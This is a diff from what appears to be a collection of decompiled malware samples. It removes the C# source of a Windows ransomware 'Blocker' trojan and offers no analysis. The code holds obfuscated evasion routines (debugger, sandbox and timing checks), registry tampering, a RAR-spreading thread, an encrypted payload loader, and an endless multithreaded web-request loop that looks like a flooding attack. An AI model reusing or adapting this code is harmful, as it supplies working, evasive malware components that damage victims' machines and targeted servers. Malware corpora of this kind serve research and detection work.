if (!c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ca20a8f4602f269ed2947b3a5ca5860a2)
return;
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1874), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2009), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
try
{
Registry.CurrentUser.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
Registry.LocalMachine.OpenSubKey(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2047), true).SetValue(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2162), (object) c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2044), RegistryValueKind.DWord);
}
catch
{
}
}
}
}

47
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c57ac7140997a29abffbea04a04f33fc6.cs
View File

@ -1,47 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c57ac7140997a29abffbea04a04f33fc6
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using Stub;
using System;
using System.Threading;
namespace A
{
internal class c57ac7140997a29abffbea04a04f33fc6
{
public static c9988649815b3bee89b89ce1f70add59a c5a948dc66b99c61ab7c2f0ddb4575bab = new c9988649815b3bee89b89ce1f70add59a();
public static cee7cc3756d4f6d8913411c92b2e1cc36 c4a101047227d6769ba130216f202ea07 = new cee7cc3756d4f6d8913411c92b2e1cc36();
public static c3037471a929a2c4f79d69973718345fa c906da2a7a2d79845c79ec2f4265c6c3c = new c3037471a929a2c4f79d69973718345fa();
public static c3f3e07dcb3874c5b417537b713b608b7 cb5ecebe7cbd234304d7228da096a3fa0 = new c3f3e07dcb3874c5b417537b713b608b7();
private static c6c454dac7269c067c2acbc6d3596af91 c1f59c75a7758cd88db10cb053ec12484 = new c6c454dac7269c067c2acbc6d3596af91();
private static c9b81b1a3e4ee51d08f5de2448e459036 cd3beb5c7063d57804364840e4ac23c4c = new c9b81b1a3e4ee51d08f5de2448e459036();
public static void c56feb5559c9c148fe3f0ec4770d94bc0(string[] c01306e5de7acf5afd10f9b0df1fe65dd)
{
c6483995e04301d945fdc8bbbeb2fdfcb.cface76737f299c15f46aea51d2f361b6();
if (!c57ac7140997a29abffbea04a04f33fc6.c1f59c75a7758cd88db10cb053ec12484.cf207f3ae43b7e20165972765acd61caf())
Environment.Exit(-1);
c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f = c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.c72aa46ec5ece51f7696deeb664e545ce();
c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2 = c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.c738d27e0c9d7bf012cc5f99d4e1976d7();
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c366d1ab19bbdf3ebcee35b30020550b1();
c57ac7140997a29abffbea04a04f33fc6.cd3beb5c7063d57804364840e4ac23c4c.ccca4f7e07f327977d582f4cecb7af4cd();
c57ac7140997a29abffbea04a04f33fc6.cd8bddfe2d687609fcccf8a112b76812e();
}
private static void cd8bddfe2d687609fcccf8a112b76812e()
{
if (!c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c3bb3892b091698f44f5eef2d60b4fdce)
return;
try
{
new Thread(new ThreadStart(cRARSpread.RARSpread)).Start();
}
catch
{
}
}
}
}

214
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c6483995e04301d945fdc8bbbeb2fdfcb.cs
View File

@ -1,214 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c6483995e04301d945fdc8bbbeb2fdfcb
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
namespace A
{
internal class c6483995e04301d945fdc8bbbeb2fdfcb
{
internal const uint c815d7d663eef3c44b2caa9f3d6111388 = 1024;
internal const uint ce1a64a0ce40f52be8d5cd5f2ab8d4bec = 64;
internal const int c9e8de4583ee928c4800269558d166b7e = 0;
private static bool c75ea3b951856ad38b52cbf8b6402d522;
[DllImport("kernel32.dll", EntryPoint = "SetLastError")]
internal static extern void c391cc9da68ba80667b423713f74af35b(
uint c3c2d28d090853af7ce1e2c9436d4e6b3);
[DllImport("kernel32.dll", EntryPoint = "CloseHandle")]
internal static extern int cace4d6faccfae54b4cce02f5ff6a9d78(
IntPtr c1511c2036aa4b7ba89764385ca9dba92);
[DllImport("kernel32.dll", EntryPoint = "OpenProcess")]
internal static extern IntPtr ccfa0dd8bc046c30e43dcac27b0790853(
uint c104f3bd454450b5fae258ea4698c08fa,
int c7e99aabe62df3fabf80d42cf90e0e3f0,
uint c56f77053e15999af6844efc9bdde822d);
[DllImport("kernel32.dll", EntryPoint = "GetCurrentProcessId")]
internal static extern uint c30c15026493b976c2325f72361ac915c();
[DllImport("kernel32.dll", EntryPoint = "LoadLibrary", CharSet = CharSet.Auto, SetLastError = true)]
internal static extern IntPtr c70f94891cb4225163b481930fa82b941(
string c17f152cc83728b20f2e2e392435ccca5);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c808000474b78cc57ff5e0ac36b3fcc73 cb3b55426f89535f91bb419e6996e2646(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cc055647fecedcfcae1eaf4bbad26d609 c6dbc9e316fddad0a9f7623fb3be9ceff(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cdf87155547dda952c916d9b76727151f(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c4d8130fdf16941c5a049e8c5637a73b3(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c8b9df66c099e027db7fe27eeb5d97544 c823a12567a85c9243ae40e47539c1cbb(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
[DllImport("kernel32.dll", EntryPoint = "GetProcAddress", CharSet = CharSet.Ansi)]
internal static extern c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c7dda1f225a33dfcf98fae6f7e3f67461(
IntPtr c6b70c3224512397ad0c3a2798d87e490,
string c85d99f904a6bb91d7c1a6a0954317af3);
private static int c084af11cdc465888c3ed538fb3591a27(
IntPtr c157a4097f532e5292cc2957be55db66e,
IntPtr c3ac7a813ea74272766c650f10278c114)
{
string[] strArray = new string[1]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2181)
};
string strA = c6483995e04301d945fdc8bbbeb2fdfcb.c8859338e5a3695a878c4bf6705d5751e(c157a4097f532e5292cc2957be55db66e);
foreach (string strB in strArray)
{
if (string.Compare(strA, strB, true) == 0)
{
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = true;
return 0;
}
}
return 1;
}
[DllImport("user32.dll", EntryPoint = "GetClassName", CharSet = CharSet.Auto)]
internal static extern int cbb7fbb3e253592177be35000370dc20a(
IntPtr c3ffd86e445fc1629a21a22d8b6f86a4b,
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490,
int c668f9f3a61afe17d1174701f81735e18);
internal static string c8859338e5a3695a878c4bf6705d5751e(
IntPtr c5de7cfd6591e65c25b36e0738fcc29da)
{
StringBuilder cb9c6716f9fec7a6b7c9e19bedc9f2490 = new StringBuilder(260);
c6483995e04301d945fdc8bbbeb2fdfcb.cbb7fbb3e253592177be35000370dc20a(c5de7cfd6591e65c25b36e0738fcc29da, cb9c6716f9fec7a6b7c9e19bedc9f2490, cb9c6716f9fec7a6b7c9e19bedc9f2490.Capacity);
return cb9c6716f9fec7a6b7c9e19bedc9f2490.ToString();
}
internal static void cface76737f299c15f46aea51d2f361b6()
{
if (c6483995e04301d945fdc8bbbeb2fdfcb.ca73ad72d5e801fc691a6bdacf00b1e12())
throw new Exception(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2196));
}
internal static bool ca73ad72d5e801fc691a6bdacf00b1e12()
{
try
{
if (Debugger.IsAttached)
return true;
IntPtr c6b70c3224512397ad0c3a2798d87e490 = c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2352));
c6483995e04301d945fdc8bbbeb2fdfcb.c9d3e290b2a38dccd6dec3b8cbf70f0c7 c9d3e290b2a38dccd6dec3b8cbf70f0c7 = c6483995e04301d945fdc8bbbeb2fdfcb.c4d8130fdf16941c5a049e8c5637a73b3(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2377));
if (c9d3e290b2a38dccd6dec3b8cbf70f0c7 != null && c9d3e290b2a38dccd6dec3b8cbf70f0c7() != 0)
return true;
IntPtr num1 = c6483995e04301d945fdc8bbbeb2fdfcb.ccfa0dd8bc046c30e43dcac27b0790853(1024U, 0, c6483995e04301d945fdc8bbbeb2fdfcb.c30c15026493b976c2325f72361ac915c());
if (num1 != IntPtr.Zero)
{
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.cb52fb1903297a0d67737ce529c917679 cb52fb1903297a0d67737ce529c917679 = c6483995e04301d945fdc8bbbeb2fdfcb.cdf87155547dda952c916d9b76727151f(c6b70c3224512397ad0c3a2798d87e490, c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2412));
if (cb52fb1903297a0d67737ce529c917679 != null)
{
int pbDebuggerPresent = 0;
if (cb52fb1903297a0d67737ce529c917679(num1, ref pbDebuggerPresent) != 0)
{
if (pbDebuggerPresent != 0)
return true;
}
}
}
finally
{
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(num1);
}
}
bool flag = false;
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.cace4d6faccfae54b4cce02f5ff6a9d78(new IntPtr(305419896));
}
catch
{
flag = true;
}
if (flag)
return true;
try
{
c6483995e04301d945fdc8bbbeb2fdfcb.c92e35801b4eaae7ab7d70e17c0173e9c c92e35801b4eaae7ab7d70e17c0173e9c = c6483995e04301d945fdc8bbbeb2fdfcb.c7dda1f225a33dfcf98fae6f7e3f67461(c6483995e04301d945fdc8bbbeb2fdfcb.c70f94891cb4225163b481930fa82b941(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2465)), c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(2486));
if (c92e35801b4eaae7ab7d70e17c0173e9c != null)
{
c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522 = false;
int num2 = c92e35801b4eaae7ab7d70e17c0173e9c(new c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737(c6483995e04301d945fdc8bbbeb2fdfcb.c084af11cdc465888c3ed538fb3591a27), IntPtr.Zero);
if (c6483995e04301d945fdc8bbbeb2fdfcb.c75ea3b951856ad38b52cbf8b6402d522)
return true;
}
}
catch
{
}
}
catch
{
}
return false;
}
[StructLayout(LayoutKind.Sequential)]
internal class c35ad2d2b7d5d5e5e9092a2e2f7ca2384
{
internal IntPtr c7ba91d8fad77443c443bf7d678c49ce5;
internal IntPtr cbd073e7d3c73e14c44cb6a8c7608c269;
internal IntPtr ce57239c4110302077b325d4f0ddc2a7e;
internal IntPtr cbe6898bbda725d30c0f429c4e8b0262e;
internal IntPtr c4517ace766e7dab5ea383c670cb1d2eb;
internal IntPtr c6609b7e1d07cfe2dc208c6746a4a790d;
}
internal delegate int c808000474b78cc57ff5e0ac36b3fcc73(
IntPtr ProcessHandle,
int ProcessInformationClass,
c6483995e04301d945fdc8bbbeb2fdfcb.c35ad2d2b7d5d5e5e9092a2e2f7ca2384 ProcessInformation,
uint ProcessInformationLength,
out uint ReturnLength);
internal delegate int cc055647fecedcfcae1eaf4bbad26d609(
IntPtr ProcessHandle,
int ProcessInformationClass,
out uint debugPort,
uint ProcessInformationLength,
out uint ReturnLength);
internal delegate int c9d3e290b2a38dccd6dec3b8cbf70f0c7();
internal delegate void c8b9df66c099e027db7fe27eeb5d97544([MarshalAs(UnmanagedType.LPStr)] string lpOutputString);
internal delegate int cb52fb1903297a0d67737ce529c917679(
IntPtr hProcess,
ref int pbDebuggerPresent);
internal delegate int cc2644b96756a32d21ac3b9be2d8f2737(IntPtr wnd, IntPtr lParam);
internal delegate int c92e35801b4eaae7ab7d70e17c0173e9c(
c6483995e04301d945fdc8bbbeb2fdfcb.cc2644b96756a32d21ac3b9be2d8f2737 lpEnumFunc,
IntPtr lParam);
}
}

184
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c6c454dac7269c067c2acbc6d3596af91.cs
View File

@ -1,184 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c6c454dac7269c067c2acbc6d3596af91
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Diagnostics;
using System.Threading;
namespace A
{
internal class c6c454dac7269c067c2acbc6d3596af91
{
public bool cf207f3ae43b7e20165972765acd61caf()
{
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cee85921584204e889e611a07cd58ecbe)
{
try
{
if (Debugger.IsAttached)
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c2792dd7fd2c0d285a78c0e499a018122)
{
try
{
long ticks = DateTime.Now.Ticks;
Thread.Sleep(10);
if (DateTime.Now.Ticks - ticks < 10L)
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c9a92257b6e60ece44ea61306d2e6b428)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c42ca1abba7c3eb2e77675d1b04109855)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(16)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c30a3cccc21356bfeddb6e1403a422049)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(31)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cc4e05926d74457f5cadf3b3016466128)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(46)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c7f5f1982284129a8f8b31dccfdfd611d)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(59)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c16ce46a32b47b87a25752f953db57737)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(68)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c95571c46a38d4a535991b6bdfeb2551e)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(81)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cbccd1ae7ab19514f4d7ff49c6066ef54)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c8aea4603f5edff1781d66fc7c389635e(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(96)))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c425aa3d25ab0dba5645b56912ea4c4d2)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(115))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c866ddb199211ac10f9ce85f741267ca5)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(162))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf18b158d9e992664f5c41c68fd861625)
{
try
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(191))
return false;
}
catch
{
}
}
if (c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cee81352979639fa55df6e014bfaad5e8)
{
try
{
string[] strArray = new string[2]
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(246),
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(297)
};
foreach (string str in strArray)
{
if (c57ac7140997a29abffbea04a04f33fc6.c906da2a7a2d79845c79ec2f4265c6c3c.ca6a4dd6f6e974a349cf2f38f0541f742() == str)
return false;
}
}
catch
{
}
}
return true;
}
}
}

71
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c723bfb08ed492f620d3f103aea9340c0.cs
View File

@ -1,71 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c723bfb08ed492f620d3f103aea9340c0
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Security.Cryptography;
namespace A
{
internal class c723bfb08ed492f620d3f103aea9340c0
{
internal static byte[] c62aa9377688ed67bcfc8a790818c7647(
Stream c46bc97527d5b5ecfa7a6ae35f370bef0)
{
byte num1 = (byte) c46bc97527d5b5ecfa7a6ae35f370bef0.ReadByte();
byte[] numArray = new byte[c46bc97527d5b5ecfa7a6ae35f370bef0.Length - 1L];
c46bc97527d5b5ecfa7a6ae35f370bef0.Read(numArray, 0, numArray.Length);
if (((int) num1 & 1) != 0)
{
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
byte[] dst1 = new byte[8];
Buffer.BlockCopy((Array) numArray, 0, (Array) dst1, 0, 8);
cryptoServiceProvider.IV = dst1;
byte[] dst2 = new byte[8];
Buffer.BlockCopy((Array) numArray, 8, (Array) dst2, 0, 8);
bool flag = true;
foreach (byte num2 in dst2)
{
if (num2 != (byte) 0)
{
flag = false;
break;
}
}
if (flag)
dst2 = Assembly.GetExecutingAssembly().GetName().GetPublicKeyToken();
cryptoServiceProvider.Key = dst2;
numArray = cryptoServiceProvider.CreateDecryptor().TransformFinalBlock(numArray, 16, numArray.Length - 16);
}
if (((int) num1 & 2) != 0)
{
try
{
MemoryStream memoryStream1 = new MemoryStream(numArray);
DeflateStream deflateStream = new DeflateStream((Stream) memoryStream1, CompressionMode.Decompress);
MemoryStream memoryStream2 = new MemoryStream((int) memoryStream1.Length * 2);
int count1 = 1000;
byte[] buffer = new byte[count1];
int count2;
do
{
count2 = deflateStream.Read(buffer, 0, count1);
if (count2 > 0)
memoryStream2.Write(buffer, 0, count2);
}
while (count2 >= count1);
numArray = memoryStream2.ToArray();
}
catch (Exception ex)
{
}
}
return numArray;
}
}
}

17
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c7bada025401008fe87db7163fb8faf48.cs
View File

@ -1,17 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c7bada025401008fe87db7163fb8faf48
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Collections.Generic;
using System.Runtime.CompilerServices;
namespace A
{
[CompilerGenerated]
internal class c7bada025401008fe87db7163fb8faf48
{
internal static Dictionary<string, int> c139b1fcd81f6e8b23501dbbfe6bf01fc;
}
}

70
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c986963ced362383f6d7b6341e31dcfe7.cs
View File

@ -1,70 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c986963ced362383f6d7b6341e31dcfe7
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System.Net;
using System.Threading;
namespace A
{
internal class c986963ced362383f6d7b6341e31dcfe7
{
private static ThreadStart[] c1aa5e7f9240b5cc21ac78813ddfbaa39;
private static Thread[] c12e108ff6c83dbee08305cc2b0ce9998;
public static string c966ab90271ad8729ab4aa4181c310abf;
private static c986963ced362383f6d7b6341e31dcfe7.c962b5c4db4e1b689718a0cfaf3910ed2[] cf0e6693c86d44a037b66e8b181b3d176;
public static int c1e5fb6eadf8fa36fbb78b515080241e1;
public static void cef8e53905308fbf449ffc06b3aecf429()
{
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998 = new Thread[c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1];
c986963ced362383f6d7b6341e31dcfe7.c1aa5e7f9240b5cc21ac78813ddfbaa39 = new ThreadStart[c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1];
c986963ced362383f6d7b6341e31dcfe7.cf0e6693c86d44a037b66e8b181b3d176 = new c986963ced362383f6d7b6341e31dcfe7.c962b5c4db4e1b689718a0cfaf3910ed2[c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1];
for (int index = 0; index < c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
c986963ced362383f6d7b6341e31dcfe7.cf0e6693c86d44a037b66e8b181b3d176[index] = new c986963ced362383f6d7b6341e31dcfe7.c962b5c4db4e1b689718a0cfaf3910ed2(c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf);
c986963ced362383f6d7b6341e31dcfe7.c1aa5e7f9240b5cc21ac78813ddfbaa39[index] = new ThreadStart(c986963ced362383f6d7b6341e31dcfe7.cf0e6693c86d44a037b66e8b181b3d176[index].c254d67f0f5a5ab80dbe5de1d1b27a54e);
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998[index] = new Thread(c986963ced362383f6d7b6341e31dcfe7.c1aa5e7f9240b5cc21ac78813ddfbaa39[index]);
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998[index].Start();
}
}
public static void c451004db98e7b627d5ee87fe743cb383()
{
for (int index = 0; index < c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1; ++index)
{
try
{
c986963ced362383f6d7b6341e31dcfe7.c12e108ff6c83dbee08305cc2b0ce9998[index].Suspend();
}
catch
{
}
}
}
private class c962b5c4db4e1b689718a0cfaf3910ed2
{
private string c966ab90271ad8729ab4aa4181c310abf;
private WebClient ccf88997dcba72d8bd4fdfcc99be9653e = new WebClient();
public c962b5c4db4e1b689718a0cfaf3910ed2(string cc083dc90fba0d59dca2c0e63ef8c500c) => this.c966ab90271ad8729ab4aa4181c310abf = cc083dc90fba0d59dca2c0e63ef8c500c;
public void c254d67f0f5a5ab80dbe5de1d1b27a54e()
{
while (true)
{
try
{
this.ccf88997dcba72d8bd4fdfcc99be9653e.DownloadString(this.c966ab90271ad8729ab4aa4181c310abf);
}
catch
{
}
}
}
}
}
}

55
MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c9988649815b3bee89b89ce1f70add59a.cs
View File

@ -1,55 +0,0 @@
// Decompiled with JetBrains decompiler
// Type: A.c9988649815b3bee89b89ce1f70add59a
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
namespace A
{
